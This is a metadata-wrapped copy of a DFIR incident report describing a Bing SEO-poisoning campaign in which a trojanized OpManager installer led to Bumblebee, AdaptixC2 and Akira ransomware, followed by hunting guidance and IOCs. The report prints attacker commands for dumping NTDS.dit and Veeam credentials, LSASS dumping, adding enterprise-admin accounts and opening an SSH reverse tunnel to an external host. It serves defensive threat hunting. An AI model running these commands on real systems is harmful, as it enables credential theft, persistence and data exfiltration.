{ "id": "c8269a75-6281-4299-bc51-1e0b2813ce8e", "created_at": "2026-04-06T00:21:52.495739Z", "updated_at": "2026-04-10T13:11:30.258718Z", "deleted_at": null, "sha1_hash": "409b3329f1526ab9dcd29e529da42ab7669e152a", "title": "From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 325014, "plain_text": "From Bing Search to Ransomware: Bumblebee and AdaptixC2\r\nDeliver Akira\r\nBy editor\r\nPublished: 2025-11-04 · Archived: 2026-04-05 21:51:58 UTC\r\nOverview\r\nBumblebee malware has been an initial access tool used by threat actors since late 2021. In 2023 the malware was\r\nfirst reported as using SEO poisoning as a delivery mechanism. Recently in May of 2025 Cyjax reported on a\r\ncampaign using this method again, impersonating various IT tools. We observed a similar campaign in July in\r\nwhich a download of an IT management tool ended with Akira ransomware.\r\nIn July 2025, we observed a threat actor compromise an organization through this SEO poisoning campaign. A\r\nuser searching for “ManageEngine OpManager” was directed to a malicious website, which delivered a trojanized\r\nsoftware installer. This action led to the deployment of the Bumblebee malware, granting the threat actor initial\r\naccess to the environment. The intrusion quickly escalated from a single infected host to a full-scale network\r\ncompromise.\r\nFollowing initial access, the threat actor moved laterally to a domain controller, dumped credentials, installed\r\npersistent remote access tools, and exfiltrated data using an SFTP client. The intrusion culminated in the\r\ndeployment of Akira ransomware across the root domain. The threat actor returned two days later to repeat the\r\nprocess, encrypting systems within a child domain and causing significant operational disruption across the\r\nenterprise.\r\nThis campaign affected multiple organizations during July as we received confirmation of a similar intrusion\r\nresponded to by the Swisscom B2B CSIRT in which a malicious IT tool dropped Bumblebee and also ended with\r\nAkira ransomware deployment.\r\nOur customers received notice of this campaign in early July followed by a private threat brief report. If you are\r\ninterested in the full report or additional IOCs please contact us.\r\nPrivate Threat Briefs: 20+ private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver,\r\netc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor\r\nInsights reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 1 of 7\n\nContact us today for pricing or a demo!\r\nThis intrusion began when a user, searching for “ManageEngine OpManager” on Bing, was directed to the\r\nmalicious site opmanager[.]pro.\r\nThe user downloaded a trojanized MSI installer, ManageEngine-OpManager.msi, which, upon execution, installed\r\nthe legitimate software while simultaneously loading the Bumblebee malware msimg32.dll via consent.exe.\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 2 of 7\n\nThe Bumblebee malware established command and control (C2) with 109.205.195[.]211:443 and\r\n188.40.187[.]145:443 using DGA domains.\r\nBy targeting IT management tools and software in both our intrusion and the one observed by Swisscom B2B\r\nCSIRT, the users executing the malware were highly privileged IT administrator accounts within Active Directory.\r\nThis provided easy privileged access to the threat actors for their next actions.\r\nApproximately five hours after this initial execution, Bumblebee deployed an AdaptixC2 beacon (AdgNsy.exe),\r\nwhich established a new C2 channel to 172.96.137[.]160:443. The threat actor then initiated internal\r\nreconnaissance using built-in Windows utilities, including systeminfo, nltest /dclist:, whoami /groups, and net\r\ngroup domain admins /dom.\r\nFollowing this, the threat actor then created two new domain accounts, backup_DA and backup_EA, and added\r\nthe latter to the “Enterprise Administrators” group. Using the privileged backup_EA account, the threat actor\r\nconnected to a domain controller via RDP and dumped the NTDS.dit file using wbadmin.exe.\r\nwbadmin.exe start backup -backuptarget:\\\\127.0.0.1\\C$\\ProgramData\\ -include\":C:\\windows\\NTDS\\ntds.dit\r\nFor persistence and re-entry, the threat actor installed the RustDesk remote access tool on several hosts. In a\r\nsubsequent session, the threat actor established a SSH tunnel to an external server at 193.242.184[.]150 to proxy\r\ntheir activity.\r\nssh root@193.242.184.150 -R *:10400 -p22\r\nThey continued discovery by deploying a renamed SoftPerfect network scanner (n.exe). Following this, they\r\ntargeted a backup server, and attempted to dump credentials from the Veeam PostgreSQL database.\r\npsql.exe -U postgres --csv -d VeeamBackup -w -c \"SELECT user_name,password,description,change_time_ut\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 3 of 7\n\nAround the same time, the threat actor installed FileZilla on a file server and exfiltrated data via SFTP to\r\n185.174.100[.]203.\r\nThey performed LSASS memory dumping on multiple workstations using rundll32.exe with comsvcs.dll using a\r\ncombination of remote services and WMI. The threat actor then deployed the Akira ransomware payload,\r\nlocker.exe, and executed it with various command-line options to encrypt local, remote network shares, and other\r\ndirectories on remote hosts.\r\nTwo days after this first ransomware deployment, the threat actor returned via RustDesk, connected to a child\r\ndomain controller, and performed another round of discovery using Invoke-ShareFinder and DNS zone export\r\ncommands, before deploying Akira ransomware to the child domain.\r\nTime to the first round of ransomware (TTR) was just shy of 44 hours after initial access. Swisscom B2B CSIRT\r\nreported an even faster TTR of just nine hours from initial access.\r\nDuring our investigation of the OpManager site, we identified two additional websites that appear to be\r\ndistributing trojanized installers for Axis Camera tools and Angry IP Scanner. Refer to the IOC section for further\r\ndetails.\r\nDetection Engineering and Threat Hunting (DEATH)\r\nHunt for MSI installations from user directories followed by suspicious child processes:\r\nMonitor msiexec.exe executing from user Desktop/Downloads\r\n(C:\\Users\\*\\Desktop\\*.msi, C:\\ProgramData\\*.msi) and spawning unexpected children like consent.exe or\r\nunusual image load events for msimg32.dll.\r\nReview unusual MSI packages with suspicious names: Look for MSI files with generic names\r\nlike ManageEngine-OpManager.msi or rustdesk-*.msi downloaded to user directories. Is this software\r\ngenerally allowed in you environment? Is this a commonly used remote access tool for your users? Does\r\nthe software being installed make sense for the users job role?\r\nCredential Access\r\nHunt for LSASS memory dumping via comsvcs.dll with tasklist enumeration:\r\ncmd.exe /Q /c for /f \"tokens=1,2 delims= \" %%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" | find \"ls\r\nDetect LSASS dumps with unusual file extensions: Monitor rundll32.exe comsvcs.dll #+000024 writing\r\nto \\Windows\\Temp\\ with non-standard extensions like .sys, .docx, .avhdx\r\nMonitor PostgreSQL credential extraction from Veeam databases:\r\npsql.exe -U postgres --csv -d VeeamBackup -w -c \"SELECT user_name,password,description,change_time_ut\r\nMonitor wbadmin abuse for NTDS.dit/Hive dumping:\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 4 of 7\n\nwbadmin start backup -backuptarget:\\\\127.0.0.1\\C$\\ProgramData\\ -include:\"C:\\windows\\NTDS\\ntds.dit,C:\\\r\nDiscovery\r\nHunt for rapid domain enumeration sequences within short time-frames (\u003c 5 minutes):\r\ncmd.exe\r\n├── systeminfo.exe\r\n├── nltest.exe /dclist:\r\n├── nltest.exe /domain_trusts\r\n├── whoami.exe /groups\r\n├── net.exe group \"domain admins\" /dom\r\n└── net.exe group \"enterprise admins\" /dom\r\nMonitor for DNS zone exports targeting multiple domains: Look for Export-DnsServerZone commands\r\ntargeting _msdcs.*, and TrustAnchors within the same session\r\nPersistence \u0026 Privilege Escalation\r\nDetect domain user creation followed by immediate privilege escalation via net utility commands:\r\nnet user backup_EA P@ssw0rd1234 /add /dom\r\nnet group \"enterprise admins\" backup_EA /add /dom\r\nHunt for backup account creation with predictable naming patterns: Monitor net user\r\nbackup_* or backup_EA/backup_DA account creation followed by admin group additions\r\nCommand \u0026 Control\r\nMonitor for SSH reverse tunneling to external IPs:\r\nssh root@\u003cexternal_ip\u003e -R *:10400 -p22\r\nHunt for Bumblebee DGA patterns: Look for multiple DNS queries to domains matching pattern [8-14\r\nrandom chars].org (e.g., ev2sirbd269o5j[.]org, ijt0l3i8brit6q[.]org) within seconds of each other.\r\nLateral Movement\r\nHunt for RDP logons using newly created accounts: Monitor Type 10 logons from compromised internal\r\nsystems using accounts like backup_EA\r\nDetect suspicious inter-system authentication patterns: Look for authentication from initial access\r\nsystems to domain controllers within hours of account creation\r\nData Collection \u0026 Exfiltration\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 5 of 7\n\nHunt for FileZilla installation on servers followed by large outbound transfers:\r\nDetect FileZilla_*_setup.exe execution on server systems, especially when followed by significant network\r\ntraffic\r\nLook for data staging in ProgramData: Monitor file writes to C:\\ProgramData\\shares.txt,\r\nC:\\ProgramData\\*.txt containing reconnaissance output\r\nDefense Evasion\r\nDetect case variation in command execution: Hunt for mixed-case command invocations\r\nlike Cmd.eXE, CmD.Exe which may indicate evasion attempts\r\nBehavioral Correlation Rules\r\nMulti-stage attack progression: Alert when a single system exhibits: MSI installation → discovery\r\ncommands → credential access → lateral movement within 24 hours\r\nCross-system activity correlation: Hunt for accounts created on one system and immediately used for\r\nauthentication on another (\u003c= 5mins)\r\nTool deployment patterns: Monitor for remote access tool installation (RustDesk) followed by SSH\r\ntunneling activity from the same network segment\r\nIndicators of Compromise (IOCs)\r\nDomains:\r\nev2sirbd269o5j.org (Bumblebee DGA domain)\r\n2rxyt9urhq0bgj.org (Bumblebee DGA domain)\r\nDFIR Report:\r\nopmanager[.]pro (Malicious site for trojanized installer)\r\nangryipscanner.org (Malicious site for trojanized installer)\r\naxiscamerastation.org (Malicious site for trojanized installer)\r\nSwisscom B2B CSIRT:\r\nip-scanner[.]org (Malicious site for trojanized installer)\r\nIP Addresses:\r\n109.205.195[.]211 (Bumblebee C2)\r\n188.40.187[.]145 (Bumblebee C2)\r\nDFIR Report:\r\n172.96.137[.]160 (AdaptixC2 C2)\r\nSwisscom B2B CSIRT:\r\n170.130.55[.]223 (AdaptixC2 C2)\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 6 of 7\n\nDFIR Report:\r\n193.242.184[.]150 (SSH Tunnel Host)\r\nSwisscom B2B CSIRT:\r\n83.229.17[.]60 (SSH Tunnel Host)\r\n185.174.100[.]203 (SFTP Exfiltration Server)\r\nFile Hashes:\r\nDFIR Report:\r\nManageEngine-OpManager.msi\r\n186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da (Malicious installer)\r\nSwisscom B2B CSIRT:\r\nAdvanced-IP-Scanner.msi\r\na14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2 (Malicious installer)\r\nDFIR Report:\r\nmsimg32.dll\r\na6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331 (Bumblebee)\r\nSwisscom B2B CSIRT:\r\nmsimg32.dll\r\n6ba5d96e52734cbb9246bcc3decf127f780d48fa11587a1a44880c1f04404d23 (Bumblebee)\r\nDFIR Report:\r\nlocker.exe\r\nde730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d (Akira ransomware)\r\nSwisscom B2B CSIRT:\r\nwin.exe\r\n18b8e6762afd29a09becae283083c74a19fc09db1f2c3412c42f1b0178bc122a (Akira ransomware)\r\n#TB36726\r\nSource: https://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/" ], "report_names": [ "from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2" ], "threat_actors": [ { "id": "8c8fea8c-c957-4618-99ee-1e188f073a0e", "created_at": "2024-02-02T02:00:04.086766Z", "updated_at": "2026-04-10T02:00:03.563647Z", "deleted_at": null, "main_name": "Storm-1567", "aliases": [ "Akira", "PUNK SPIDER", "GOLD SAHARA" ], "source_name": "MISPGALAXY:Storm-1567", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84", "created_at": "2024-04-24T02:00:49.516358Z", "updated_at": "2026-04-10T02:00:05.309426Z", "deleted_at": null, "main_name": "Akira", "aliases": [ "Akira", "GOLD SAHARA", "PUNK SPIDER", "Howling Scorpius" ], "source_name": "MITRE:Akira", "tools": [ "Mimikatz", "PsExec", "AdFind", "Akira _v2", "Akira", "Megazord", "LaZagne", "Rclone" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434912, "ts_updated_at": 1775826690, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/409b3329f1526ab9dcd29e529da42ab7669e152a.pdf", "text": "https://archive.orkl.eu/409b3329f1526ab9dcd29e529da42ab7669e152a.txt", "img": "https://archive.orkl.eu/409b3329f1526ab9dcd29e529da42ab7669e152a.jpg" } }